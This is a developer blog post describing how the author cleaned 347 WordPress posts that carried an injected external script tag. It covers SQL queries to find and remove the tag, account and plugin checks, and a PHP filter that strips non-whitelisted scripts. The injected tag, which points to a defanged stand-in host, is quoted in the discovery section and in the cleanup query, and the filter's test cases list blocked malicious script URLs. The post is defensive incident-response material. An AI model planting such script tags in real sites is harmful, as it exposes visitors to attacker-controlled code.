DEV Community: Mohamed Amine Yaakoubi The latest articles on DEV Community by Mohamed Amine Yaakoubi (@amine_y). https://dev.to/amine_y https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1722531%2F7cb2a34d-2c15-4d85-a921-1274ae478d29.jpg DEV Community: Mohamed Amine Yaakoubi https://dev.to/amine_y en How I Cleaned a Hacked WordPress Database in 5 Minutes Mohamed Amine Yaakoubi Sat, 01 Nov 2025 16:07:40 +0000 https://dev.to/amine_y/how-i-cleaned-a-hacked-wordpress-database-in-5-minutes-3d69 https://dev.to/amine_y/how-i-cleaned-a-hacked-wordpress-database-in-5-minutes-3d69 <p>Security incidents happen. What matters is how quickly you can respond. Here's how I cleaned a compromised WordPress database when I discovered malicious JavaScript injected into hundreds of posts.</p> <h2> The Discovery </h2> <p>During a routine site check, I noticed suspicious external script loading on multiple pages. The pattern was consistent:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="nt">&lt;script </span><span class="na">src=</span><span class="s">'https://malicious-cdn[.]example/m.js?n=ns1'</span> <span class="na">type=</span><span class="s">'text/javascript'</span><span class="nt">&gt;&lt;/script&gt;</span> </code></pre> </div> <p>This script was appearing in post content across the entire site. Classic injection attack—probably from a compromised admin account or vulnerable plugin.</p> <p><strong>Note:</strong> Domain defanged (<code>[.]</code> instead of <code>.</code>) for security reasons. This was a real attack using a suspicious <code>.ga</code> domain.</p> <h2> The Damage Assessment </h2> <p>First, I needed to know the scope:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">wp_posts</span> <span class="k">WHERE</span> <span class="n">post_content</span> <span class="k">LIKE</span> <span class="s1">'%malicious-cdn[.]example%'</span><span class="p">;</span> </code></pre> </div> <p><strong>Result</strong>: 347 affected posts. Too many to manually clean.</p> <p>The attacker had injected the script tag into the <code>post_content</code> field of the <code>wp_posts</code> table. Smart attackers target this because:</p> <ul> <li>Content is rarely validated after initial save</li> <li>It affects published and draft content</li> <li>It persists through theme changes</li> <li>Most security plugins don't scan post content by default</li> </ul> <h2> The One-Query Solution </h2> <p>Instead of writing a complex PHP script or plugin, I used SQL's <code>REPLACE</code> function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">UPDATE</span> <span class="n">wp_posts</span> <span class="k">SET</span> <span class="n">post_content</span> <span class="o">=</span> <span class="k">REPLACE</span><span class="p">(</span> <span class="n">post_content</span><span class="p">,</span> <span class="nv">"&lt;script src='https://malicious-cdn[.]example/m.js?n=ns1' type='text/javascript'&gt;&lt;/script&gt;"</span><span class="p">,</span> <span class="nv">""</span> <span class="p">)</span> <span class="k">WHERE</span> <span class="n">post_content</span> <span class="k">LIKE</span> <span class="s1">'%malicious-cdn[.]example%'</span><span class="p">;</span> </code></pre> </div> <p><strong>Why this works:</strong></p> <ul> <li> <code>REPLACE</code> searches the entire content field</li> <li>Removes only the exact malicious string</li> <li>Preserves all other content</li> <li>Executes in seconds even on thousands of posts</li> </ul> <h2> Verification Steps </h2> <p>After running the cleanup, I verified:</p> <h3> 1. Check Affected Rows </h3> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">wp_posts</span> <span class="k">WHERE</span> <span class="n">post_content</span> <span class="k">LIKE</span> <span class="s1">'%malicious-cdn[.]example%'</span><span class="p">;</span> </code></pre> </div> <p>Should return 0.</p> <h3> 2. Spot Check Random Posts </h3> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="k">SELECT</span> <span class="n">ID</span><span class="p">,</span> <span class="n">post_title</span><span class="p">,</span> <span class="n">post_content</span> <span class="k">FROM</span> <span class="n">wp_posts</span> <span class="k">WHERE</span> <span class="n">post_type</span> <span class="o">=</span> <span class="s1">'post'</span> <span class="k">AND</span> <span class="n">post_status</span> <span class="o">=</span> <span class="s1">'publish'</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="n">RAND</span><span class="p">()</span> <span class="k">LIMIT</span> <span class="mi">10</span><span class="p">;</span> </code></pre> </div> <h3> 3. Check the Site </h3> <p>Visit the site in incognito mode and inspect the source. Search for the suspicious domain name.</p> <h2> The Broader Security Fix </h2> <p>Cleaning the database is step one. Here's what I did next:</p> <h3> Immediate Actions </h3> <ol> <li> <strong>Changed all admin passwords</strong> (especially super admin)</li> <li> <strong>Checked for suspicious admin users</strong>: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">wp_users</span> <span class="k">WHERE</span> <span class="n">user_email</span> <span class="k">LIKE</span> <span class="s1">'%suspicious-domain%'</span><span class="p">;</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">wp_users</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="n">user_registered</span> <span class="k">DESC</span> <span class="k">LIMIT</span> <span class="mi">10</span><span class="p">;</span> </code></pre> </div> <ol> <li> <strong>Reviewed recent plugin installations</strong>: </li> </ol> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code> <span class="k">SELECT</span> <span class="n">option_value</span> <span class="k">FROM</span> <span class="n">wp_options</span> <span class="k">WHERE</span> <span class="n">option_name</span> <span class="o">=</span> <span class="s1">'recently_activated'</span><span class="p">;</span> </code></pre> </div> <h3> Hardening Steps </h3> <ol> <li> <strong>Updated everything</strong>: WordPress core, themes, plugins</li> <li><strong>Removed unused plugins and themes</strong></li> <li> <strong>Implemented security headers</strong> in <code>.htaccess</code> </li> <li><strong>Added file integrity monitoring</strong></li> <li> <strong>Enabled 2FA</strong> for all admin accounts</li> </ol> <h3> Prevention Strategy </h3> <p>To prevent future attacks, I added a content filter that blocks unauthorized external scripts.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="c1">// Added to functions.php - strips unauthorized script tags from post content on save</span> <span class="nf">add_filter</span><span class="p">(</span><span class="s1">'content_save_pre'</span><span class="p">,</span> <span class="k">function</span><span class="p">(</span><span class="nv">$content</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Allow only whitelisted domains</span> <span class="nv">$allowed_domains</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'youtube.com'</span><span class="p">,</span> <span class="s1">'vimeo.com'</span><span class="p">,</span> <span class="s1">'trusted-cdn.com'</span><span class="p">];</span> <span class="c1">// Match script tags with src attributes (with flexible spacing)</span> <span class="nb">preg_match_all</span><span class="p">(</span><span class="s1">'/&lt;script[^&gt;]*src\s*=\s*["\']([^"\']*)["\'][^&gt;]*&gt;/i'</span><span class="p">,</span> <span class="nv">$content</span><span class="p">,</span> <span class="nv">$matches</span><span class="p">);</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="k">empty</span><span class="p">(</span><span class="nv">$matches</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span> <span class="p">{</span> <span class="k">foreach</span> <span class="p">(</span><span class="nv">$matches</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">as</span> <span class="nv">$key</span> <span class="o">=&gt;</span> <span class="nv">$script_tag</span><span class="p">)</span> <span class="p">{</span> <span class="nv">$src</span> <span class="o">=</span> <span class="nv">$matches</span><span class="p">[</span><span class="mi">1</span><span class="p">][</span><span class="nv">$key</span><span class="p">];</span> <span class="c1">// Skip relative URLs (local scripts are safe)</span> <span class="k">if</span> <span class="p">(</span><span class="nb">strpos</span><span class="p">(</span><span class="nv">$src</span><span class="p">,</span> <span class="s1">'//'</span><span class="p">)</span> <span class="o">===</span> <span class="kc">false</span><span class="p">)</span> <span class="p">{</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span> <span class="c1">// Parse URL and handle errors</span> <span class="nv">$parsed</span> <span class="o">=</span> <span class="nb">parse_url</span><span class="p">(</span><span class="nv">$src</span><span class="p">);</span> <span class="c1">// If parse fails or no host, block it (likely malformed)</span> <span class="k">if</span> <span class="p">(</span><span class="nv">$parsed</span> <span class="o">===</span> <span class="kc">false</span> <span class="o">||</span> <span class="k">empty</span><span class="p">(</span><span class="nv">$parsed</span><span class="p">[</span><span class="s1">'host'</span><span class="p">]))</span> <span class="p">{</span> <span class="nv">$content</span> <span class="o">=</span> <span class="nb">str_replace</span><span class="p">(</span><span class="nv">$script_tag</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="nv">$content</span><span class="p">);</span> <span class="nb">error_log</span><span class="p">(</span><span class="s2">"Blocked malformed script URL: </span><span class="nv">$src</span><span class="s2">"</span><span class="p">);</span> <span class="k">continue</span><span class="p">;</span> <span class="p">}</span> <span class="nv">$domain</span> <span class="o">=</span> <span class="nv">$parsed</span><span class="p">[</span><span class="s1">'host'</span><span class="p">];</span> <span class="c1">// Remove www. for comparison</span> <span class="nv">$domain</span> <span class="o">=</span> <span class="nb">preg_replace</span><span class="p">(</span><span class="s1">'/^www\./i'</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="nv">$domain</span><span class="p">);</span> <span class="c1">// Check if domain or parent domain is in whitelist</span> <span class="nv">$is_allowed</span> <span class="o">=</span> <span class="kc">false</span><span class="p">;</span> <span class="k">foreach</span> <span class="p">(</span><span class="nv">$allowed_domains</span> <span class="k">as</span> <span class="nv">$allowed</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Case-insensitive check for exact match or subdomain</span> <span class="k">if</span> <span class="p">(</span><span class="nb">strcasecmp</span><span class="p">(</span><span class="nv">$domain</span><span class="p">,</span> <span class="nv">$allowed</span><span class="p">)</span> <span class="o">===</span> <span class="mi">0</span> <span class="o">||</span> <span class="nb">preg_match</span><span class="p">(</span><span class="s1">'/\.'</span> <span class="mf">.</span> <span class="nb">preg_quote</span><span class="p">(</span><span class="nv">$allowed</span><span class="p">,</span> <span class="s1">'/'</span><span class="p">)</span> <span class="mf">.</span> <span class="s1">'$/i'</span><span class="p">,</span> <span class="nv">$domain</span><span class="p">))</span> <span class="p">{</span> <span class="nv">$is_allowed</span> <span class="o">=</span> <span class="kc">true</span><span class="p">;</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span> <span class="p">}</span> <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="nv">$is_allowed</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// Remove this specific script tag only</span> <span class="nv">$content</span> <span class="o">=</span> <span class="nb">str_replace</span><span class="p">(</span><span class="nv">$script_tag</span><span class="p">,</span> <span class="s1">''</span><span class="p">,</span> <span class="nv">$content</span><span class="p">);</span> <span class="nb">error_log</span><span class="p">(</span><span class="s2">"Blocked unauthorized script from: </span><span class="nv">$domain</span><span class="s2"> (original: </span><span class="nv">$src</span><span class="s2">)"</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="p">}</span> <span class="k">return</span> <span class="nv">$content</span><span class="p">;</span> <span class="p">});</span> </code></pre> </div> <p><strong>What this handles correctly:</strong></p> <ul> <li>✅ Subdomains: <code>m.youtube.com</code>, <code>www.youtube.com</code> </li> <li>✅ Local scripts: <code>/js/app.js</code> (allowed)</li> <li>✅ Case insensitive: <code>YOUTUBE.COM</code> = <code>youtube.com</code> </li> <li>✅ Malformed URLs: Caught and logged</li> <li>✅ Subdomain wildcards: <code>cdn.vimeo.com</code> allowed if <code>vimeo.com</code> whitelisted</li> </ul> <p><strong>Test Cases:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight php"><code><span class="c1">// ✅ These get ALLOWED</span> <span class="o">&lt;</span><span class="n">script</span> <span class="n">src</span><span class="o">=</span><span class="s2">"/js/local.js"</span><span class="o">&gt;&lt;/</span><span class="n">script</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">script</span> <span class="n">src</span><span class="o">=</span><span class="s2">"https://www.youtube.com/embed.js"</span><span class="o">&gt;&lt;/</span><span class="n">script</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">script</span> <span class="n">src</span><span class="o">=</span><span class="s2">"https://cdn.vimeo.com/player.js"</span><span class="o">&gt;&lt;/</span><span class="n">script</span><span class="o">&gt;</span> <span class="c1">// ❌ These get BLOCKED</span> <span class="o">&lt;</span><span class="n">script</span> <span class="n">src</span><span class="o">=</span><span class="s2">"https://evil-site.com/malware.js"</span><span class="o">&gt;&lt;/</span><span class="n">script</span><span class="o">&gt;</span> <span class="o">&lt;</span><span class="n">script</span> <span class="n">src</span><span class="o">=</span><span class="s2">"https://youtubee.com/fake.js"</span><span class="o">&gt;&lt;/</span><span class="n">script</span><span class="o">&gt;</span> <span class="c1">// Typosquatting</span> <span class="o">&lt;</span><span class="n">script</span> <span class="n">src</span><span class="o">=</span><span class="s2">"//suspicious.ga/script.js"</span><span class="o">&gt;&lt;/</span><span class="n">script</span><span class="o">&gt;</span> </code></pre> </div> <h3> Important Limitations </h3> <p><strong>Before using this in production, consider:</strong></p> <p>⚠️ <strong>Performance</strong>: Runs on every post save (auto-saves included)<br><br> ⚠️ <strong>Silent operation</strong>: Users won't be notified when scripts are removed<br><br> ⚠️ <strong>Limited scope</strong>: Only catches <code>&lt;script src=""&gt;</code> tags (not inline scripts or obfuscated code)<br><br> ⚠️ <strong>Hardcoded whitelist</strong>: No admin UI for managing allowed domains<br><br> ⚠️ <strong>No backup</strong>: Content is modified immediately without versioning </p> <p><strong>Better for production:</strong></p> <ul> <li>Add caching to avoid processing unchanged content</li> <li>Implement admin notifications for blocked scripts</li> <li>Create a settings page for whitelist management</li> <li>Consider using Content Security Policy headers instead</li> <li>Use WordPress revision system to track changes</li> </ul> <p>This code is solid for emergency response and small sites, but <strong>high-traffic sites</strong> should consider a more robust solution with proper admin controls and performance optimization.</p> <h2> Lessons Learned </h2> <h3> 1. Database Direct Access &gt; Plugin Overhead </h3> <p>For bulk operations, direct SQL is often faster and more reliable than WordPress plugins. Know when to bypass the abstraction layer.</p> <h3> 2. Search Before You Replace </h3> <p>Always run a <code>SELECT</code> query first to see what you're affecting. Never run an <code>UPDATE</code> blind.</p> <h3> 3. Test Your Security Code Thoroughly </h3> <p>The first version of my content filter had bugs! Edge cases matter in security:</p> <ul> <li>Subdomain handling</li> <li>URL parsing errors</li> <li>Local vs external scripts</li> <li>Case sensitivity</li> </ul> <p>Always test with both valid and malicious inputs.</p> <h3> 4. Understand Your Code's Limitations </h3> <p>No security solution is perfect. Know what your code does <strong>and doesn't</strong> protect against. Document limitations for future maintainers.</p> <h3> 5. Backup Before Everything </h3> <p>I had a recent backup, so if this went wrong, I could restore. <strong>If you don't have automated backups, stop reading and set them up now.</strong></p> <h3> 6. Security is Ongoing </h3> <p>This wasn't a one-time fix. Security requires:</p> <ul> <li>Regular updates</li> <li>Activity monitoring</li> <li>Access audits</li> <li>User education</li> <li>Layered defense</li> </ul> <h2> The Quick Reference </h2> <p>Save this for emergencies:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight sql"><code><span class="c1">-- 1. Find the malicious code</span> <span class="k">SELECT</span> <span class="n">ID</span><span class="p">,</span> <span class="n">post_title</span> <span class="k">FROM</span> <span class="n">wp_posts</span> <span class="k">WHERE</span> <span class="n">post_content</span> <span class="k">LIKE</span> <span class="s1">'%suspicious-pattern%'</span><span class="p">;</span> <span class="c1">-- 2. Backup first!</span> <span class="k">CREATE</span> <span class="k">TABLE</span> <span class="n">wp_posts_backup</span> <span class="k">AS</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">wp_posts</span><span class="p">;</span> <span class="c1">-- 3. Clean it</span> <span class="k">UPDATE</span> <span class="n">wp_posts</span> <span class="k">SET</span> <span class="n">post_content</span> <span class="o">=</span> <span class="k">REPLACE</span><span class="p">(</span><span class="n">post_content</span><span class="p">,</span> <span class="s1">'&lt;malicious-code&gt;'</span><span class="p">,</span> <span class="s1">''</span><span class="p">)</span> <span class="k">WHERE</span> <span class="n">post_content</span> <span class="k">LIKE</span> <span class="s1">'%suspicious-pattern%'</span><span class="p">;</span> <span class="c1">-- 4. Verify</span> <span class="k">SELECT</span> <span class="k">COUNT</span><span class="p">(</span><span class="o">*</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">wp_posts</span> <span class="k">WHERE</span> <span class="n">post_content</span> <span class="k">LIKE</span> <span class="s1">'%suspicious-pattern%'</span><span class="p">;</span> <span class="c1">-- 5. Check users</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">wp_users</span> <span class="k">ORDER</span> <span class="k">BY</span> <span class="n">user_registered</span> <span class="k">DESC</span><span class="p">;</span> <span class="c1">-- 6. Check options</span> <span class="k">SELECT</span> <span class="o">*</span> <span class="k">FROM</span> <span class="n">wp_options</span> <span class="k">WHERE</span> <span class="n">option_value</span> <span class="k">LIKE</span> <span class="s1">'%suspicious%'</span><span class="p">;</span> </code></pre> </div> <h2> Tools That Helped </h2> <ul> <li> <strong>Wordfence</strong>: Post-cleanup scan</li> <li> <strong>UpdraftPlus</strong>: Automated backups</li> <li> <strong>Adminer</strong>: Lightweight database management for safe query testing</li> </ul> <h2> What Would You Do? </h2> <p>Have you dealt with WordPress hacks? What's your go-to cleanup strategy?</p> <p>I'm particularly interested in:</p> <ul> <li>Automated malware detection approaches</li> <li>Prevention strategies that actually work</li> <li>Balancing security with site performance</li> <li>Bugs you've found in security code (we all write them!)</li> <li>When you'd use a filter vs CSP headers</li> </ul> <p>Drop your thoughts below! 👇</p> wordpress security database malwareremoval